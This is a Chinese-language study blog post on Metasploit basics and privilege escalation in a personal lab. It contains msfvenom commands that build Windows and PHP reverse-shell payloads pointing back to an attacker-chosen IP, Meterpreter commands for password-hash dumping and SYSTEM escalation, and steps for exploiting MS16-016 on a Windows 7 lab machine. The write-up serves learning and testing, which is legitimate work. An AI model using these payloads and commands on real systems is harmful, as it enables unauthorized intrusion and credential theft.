提权学习之旅——利用Metasploit提权
Metasploit基礎
0x00:簡介
Metasploit是一個漏洞利用框架,簡稱msf。是一個免費的、可下載的框架,通過它可以很容易地獲取、開發并對計算機軟件漏洞實施攻擊,,而且本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。是信息收集、漏洞掃描、權限提升、內網滲透等集成的工具。
msf一般會有四種接口對外提供,分別為
- msfconsole
- msfcli
- msfgui
- msfweb
0x01:模塊
- exploit
- payload
- auxiliary
- encoder
0x03:基礎命令
search mysql #查找 use exploit/multi/handler #使用 info #查看信息 show exploits/payloads/options #顯示可用信息 exploit/run #執行 exploit -j #后臺運行 back #返回上一級 sessions -i #查看當前可用會話 sessions -K #殺死所有活躍會話 getuid #獲得運行Meterpreter會話的用戶名,從而查看當前會話具有的權限 sysinfo #列出受控主機的系統信息 getprivs #盡可能多地獲取目標主機上的特權 getsystem #通過各種攻擊向量來提升到系統用戶權限 hashdump #導出目標主機中的口令哈希值 screenshot #對目標主機的屏幕進行截圖 background #將當前Meterpreter shell轉為后臺運行 quit #關閉當前Meterpreter會話,返回MSF終端 ps #顯示所有運行進程以及關聯的用戶賬戶 migrate PID #遷移到一個指定的進程PID execute -f cmd.exe -i# 執行從cmd.exe命令進行交互 shell #以所有可用令牌來運行一個交互的shell生成exe程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe生成php程序
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php反彈shell
exploit/multi/hander將剛才生成的shy.php上傳至另外一臺主機的Web目錄,進行訪問
發現一個session已經傳過來了
這便是一個簡單的反彈shell的操作,如果要連接上只需執行如下命令即可
使用background命令使其回到后臺運行
但是感覺連接的不是太穩定,容易出現超時狀態。
先使用web_delivery
use exploit/multi/script/web_delivery其次查看下信息
這里將targets設置為2,然后查找相應的payload進行設置
設置好之后,設置需要的參數
運行將下面的payload拿到目標機器中執行,反彈成功
這個方法相較于上一個穩定一點,這里就截一下目標機器的圖片,測試一下
測試成功。
利用Metasploit提權
0x00:MS16-016漏洞簡介
MS16-016(WebDAV特權提升漏洞),Microsoft Web分布式創作和版本管理(WebDAV)客戶端驗證輸入不當,就會存在特權提升漏洞,成功利用此漏洞可以使用提升的特權執行任意代碼
漏洞影響:
Windows Vista SP2 Windows Server 2008 x86 & x64 Windows Server 2008 R2 x64 Windows 7 x86 & x64 Windows 8.1 x86 & x64環境準備:
win7 192.168.186.131 kail 192.168.186.134還是先使用web_delivery進行反彈shell
連接成功,查看當前用戶
接下來利用powershell遠程下載Sherlock腳本并進行檢測
發現存在MS16-016漏洞,直接使用msf搜索看是否有這個漏洞的exp
使用一下,選擇一下session
進行攻擊,即可提權到system
總結
這次的學習簡單的了解了Metasploit,以及相應的提權操作,繼續學習,沖沖沖!
總結
以上是生活随笔為你收集整理的提权学习之旅——利用Metasploit提权的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTF训练计划—[CISCN2019]E
- 下一篇: 提权学习之旅——Linux操作系统提权